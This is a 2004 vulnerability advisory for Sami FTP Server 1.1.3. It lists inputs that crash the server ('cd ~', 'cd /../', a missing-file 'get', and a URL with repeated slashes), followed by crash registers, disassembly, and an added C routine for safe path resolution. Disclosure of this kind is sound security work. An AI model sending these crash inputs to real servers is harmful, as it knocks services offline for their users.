samiFTP.txt

Posted Feb 13, 2004
Authored by intuit | Site rootshells.tk

Sami FTP server version 1.1.3 has multiple vulnerabilities that can lead to a denial of service.

tags | advisory, denial of service, vulnerability
SHA-256 | 8e85094ba9a6a67593d7a265f163919d0f7792d81fbde5e9bbd4b87c19634b52

Application: Sami FTP Server
http://www.karja.com

Version: 1.1.3

Bug: multiple vulnerabilities (Denial Of Service)

Author: intuit
e-mail: intuit@linuxmail.org
web: rootshells.tk

greetz to: zigzag ;))


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"KarjaSoft's Sami brand of servers strives to provide small and powerful solutions, incorporated into the Plugin Management System. Focusing on simple configuration and small size, the Sami products still provide the functionality needed for either company or personal use. Sami FTP Server is designed to provide a fully functional FTP server, while still keeping the simplicity. With a few clicks you will be ready to share your files!"


***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

(1) Multiple vulnerabilities in the commands cd and get;
(2) requests of the form:
ftp://user:pass@127.0.0.1/<two or more "/" characters>/
-----------------------------------------------------------------------

(1):
cd ~
cd /../
get <something unavailable>
(2):
ftp://user:pass@127.0.0.1////

-----------------------------------------------------------------------

These crash pmsystem.exe with an error in module samiftp.dll.

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

(1):
The fault occurs here:

-----------------------------------------------------------------------
AppName: pmsystem.exe AppVer: 0.0.0.0 ModName: samiftp.dll
ModVer: 0.0.0.0 Offset: 0000ac53
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:

EAX=00000000 EBX=00000002 ECX=00834AB4 EDX=00830608
ESI=00834AB4 EDI=00834AA8 EIP=008DAC53 ESP=0154FD48
EBP=0154FD70 EFL=00000202
CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0

00000008 = ????????

Code(Win XP Build 2600, Service Pack: None):

008DAC20 push esi
008DAC21 mov esi,ecx
008DAC23 mov eax,dword ptr [esi+8]
008DAC26 test eax,eax
008DAC28 je 008DAC44
008DAC2A mov eax,dword ptr [esi+4]
008DAC2D push eax
008DAC2E call 008DA288
008DAC33 add esp,4
008DAC36 mov dword ptr [esi+4],0
008DAC3D mov dword ptr [esi+8],0
008DAC44 mov ecx,8DAC70h
008DAC49 test ecx,ecx
008DAC4B je 008DAC62
008DAC4D mov eax,dword ptr [esp+8]
008DAC51 mov ecx,esi
008DAC53 mov edx,dword ptr [eax+8] <<< [crash]
008DAC56 mov eax,dword ptr [eax+4]
008DAC59 push edx
008DAC5A push 0
008DAC5C push eax
008DAC5D call 008DA9E0
008DAC62 mov eax,esi
008DAC64 pop esi
008DAC65 ret 4


(2):
The fault occurs here:

-----------------------------------------------------------------------
AppName: pmsystem.exe AppVer: 0.0.0.0 ModName: samiftp.dll
ModVer: 0.0.0.0 Offset: 000036c7
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:

EAX=01000000 EBX=00835270 ECX=02F4FD2F EDX=05920007
ESI=0083BC90 EDI=02F4FD2F EIP=008D36C7 ESP=02F4FDAC
EBP=02F4FDF4 EFL=00000202
CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0

01000000 = ????????

Code(Win XP Build 2600, Service Pack: None):

008D36A5 je 008D36AD
008D36A7 mov eax,dword ptr [ecx]
008D36A9 push 1
008D36AB call dword ptr [eax]
008D36AD lea ecx,[ebp-2Ch]
008D36B0 call 008DA850
008D36B5 test ebx,ebx
008D36B7 je 008D36C1
008D36B9 mov eax,dword ptr [ebx]
008D36BB push 1
008D36BD mov ecx,ebx
008D36BF call dword ptr [eax]
008D36C1 mov eax,dword ptr [edi]
008D36C3 push 1
008D36C5 mov ecx,edi
008D36C7 call dword ptr [eax] <<< [crash]
008D36C9 lea ecx,[ebp-20h]
008D36CC call 008DA850
008D36D1 lea ecx,[ebp-14h]
008D36D4 call 008DA850
008D36D9 lea ecx,[ebp-38h]
008D36DC call 008DA850
008D36E1 pop edi
008D36E2 pop ebx
008D36E3 pop esi
008D36E4 leave
008D36E5 ret 4

-----------------------------------------------------------------------

/*Tested on: Win XP Build 2600, Service Pack: None
Win XP Build 2600, Service Pack: SP1 */

***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

None exists.
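
The advisory gives no fix and does not identify the root cause. As an added example (not KarjaSoft's code and not a patch for samiftp.dll), the routine below shows how a server can resolve the cd/get arguments from section 2 so that "~", "/../" and runs of "/" end in either a clean virtual path or an explicit refusal the caller must check. The names ftp_resolve, FTP_PATH_MAX and SEP, the length limit, and the mapping of "~" to the virtual root are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define FTP_PATH_MAX 256   /* assumed limit, not taken from the advisory */
#define SEP "/\\"          /* on Windows '\' separates path segments too */

/* Resolve a cd/get argument against the virtual directory `cwd` ("/" is the
 * share root). Writes "/" or "/a/b" to `out`; returns 0 on success, -1 when
 * the input must be refused. Callers send an FTP error on -1, never use out. */
int ftp_resolve(const char *cwd, const char *arg, char *out, size_t outsz)
{
    char work[2 * FTP_PATH_MAX + 2];
    size_t len = 1, n;

    if (!cwd || !arg || !out || outsz < 2) return -1;      /* no NULL derefs */
    if (strlen(cwd) >= FTP_PATH_MAX || strlen(arg) >= FTP_PATH_MAX) return -1;
    if (arg[0] == '~' && (arg[1] == '\0' || strchr(SEP, arg[1]))) { arg++; cwd = "/"; }
    if (arg[0] && strchr(SEP, arg[0])) cwd = "/";          /* absolute argument */
    snprintf(work, sizeof work, "%s/%s", cwd, arg);        /* fits: lengths checked */
    out[0] = '/'; out[1] = '\0';

    for (const char *p = work; *p; p += n ? n : 1) {
        n = strcspn(p, SEP);                               /* next segment length */
        if (n == 0 || (n == 1 && p[0] == '.')) continue;   /* "//" and "." vanish */
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (len == 1) return -1;                       /* ".." above the root */
            while (out[len - 1] != '/') len--;             /* cut last segment */
            if (len > 1) len--;                            /* and its '/' */
            out[len] = '\0';
            continue;
        }
        if (len + n + 2 > outsz) return -1;                /* would not fit */
        if (len > 1) out[len++] = '/';
        memcpy(out + len, p, n);
        out[len += n] = '\0';
    }
    return 0;
}

int main(void)
{
    const char *args[] = { "~", "/../", "////", "docs//a/../b" }; /* constructed */
    char out[64];
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++)
        printf("%-14s -> %s\n", args[i],
               ftp_resolve("/pub", args[i], out, sizeof out) ? "refused" : out);
    return 0;
}
```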

***********************************************************************
